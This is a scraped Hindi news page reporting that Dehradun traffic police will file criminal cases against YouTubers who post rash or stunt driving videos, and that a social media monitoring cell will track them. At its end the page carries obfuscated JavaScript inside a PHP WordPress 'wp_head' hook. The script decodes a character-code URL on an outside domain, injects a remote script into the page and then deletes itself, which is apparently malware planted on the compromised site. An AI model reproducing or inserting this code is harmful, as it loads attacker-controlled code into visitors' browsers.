Saturday, July 20, 2024
Google search engine
Homeउत्तराखंडलाईक और व्यूवर्स के चक्कर में स्टंट पड सकता है भारी, पुलिस...

लाईक और व्यूवर्स के चक्कर में स्टंट पड सकता है भारी, पुलिस अब सीधे करेगी मुकदमा दर्ज

देहरादून में रैश ड्राइविंग पर चालान के बजाय अब सीधे मुकदमा दर्ज होगा…एसपी ट्रैफिक देहरादून अक्षय कोंडे ने बताया की रैश ड्राइविंग करने वाले अमूमन यूट्यूबर्स के पास 30 से 40 लाख रुपये की बाइक होती है। कुछ तो ऐसे हैं, जिनके पास एक से अधिक बाइकें हैं। रैश ड्राइविंग करने पर चालान और आईपीसी की धारा-336 में मुकदमा तक दर्ज किया गया, लेकिन इससे उन पर इसका कोई फर्क नहीं पड़ रहा है। ऐसे में पुलिस ने उनके खिलाफ सख्त कार्रवाई की एसओपी बनाई है। एसपी ट्रैफिक के अनुसार, यूट्यूबर सब्सक्राइबर बढ़ाने की चाह में खुद के साथ दूसरों की जिंदगी को भी खतरे में डाल रहे हैं। रैश ड्राइविंग के वीडियो यूट्यूब पर अपलोड किए जाते हैं, जिनको ढेरों व्यू भी मिलते हैं। लेकिन, अब पुलिस ऐसे चैनलों पर भी नजर रख रही है। कोर्ट को भी पत्र लिखकर अनुरोध किया गया कि ऐसे चैनलों को बंद करवाने के लिए आदेश पारित किया जाए।

कैसे रखी जाएगी पैनी नजर सोशल साइट्स पर
ट्रैफिक पुलिस की नई पॉलिसी स्टंट और रेश बाइक चलाने वाले रायडर और यू-ट्यूब ब्लॉगर के विरुद्ध ज़ीरो टॉलरन्स, ना काउन्सलिंग ना चलान, अब होगा मुक़दमा वहीं यूट्यूब, फेसबुक अकाउंट किए जाएँगे बंद
सोशल मीडिया मॉनिटरिंग सेल का किया गया गठन, यातायात अधीक्षक अक्षय प्रह्लाद कोंडे ने बताया कि रेश ड्राइवर के खिलाफ कार्यवाही के लिये यातायात पुलिस ने कमर कस ली है यातायात पुलिस की सोशल मीडिया सेल द्वारा वर्ष के प्रारम्भ में रैश ड्राइविंग कर अपने ब्लॉग में इस प्रकार की वीडियो अपलोड करने वाले 12 ब्लॉगरों को चिन्हित कर काउन्सलिंग, शांतिभंग की कार्यवाही की थी यहाँ तक की कुछ लोगों पर

अभियोग पंजीकृत किया गया था
शहर क्षेत्रान्तर्गत जो यूट्यूबर रैश ड्राइविंग कर लोगों के जीवन को भय में डालकर वाहन चला रहे हैं उनपर कार्यवाही को तेजी में लाये जाने हेतु यातायात पुलिस द्वारा एक एसओपी तैयार की गयी है उक्त एसओपी में यातायात पुलिस की सोशल मीडिया को पुन सक्रीय रहते हुए ऐसे यू-ट्यूबर पर कडी नजर रखेगी जो अपने यू-ट्यूब चैनल पर रैश ड्राईविंग / स्टंट ड्राईविंग / लडकियों को छेडने, उनके रियेक्शन को वीडियो में कैद करने / मॉडिफाईड साईलसेंर का प्रयोग कर वाहन संचालित कर रहे हैं ।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>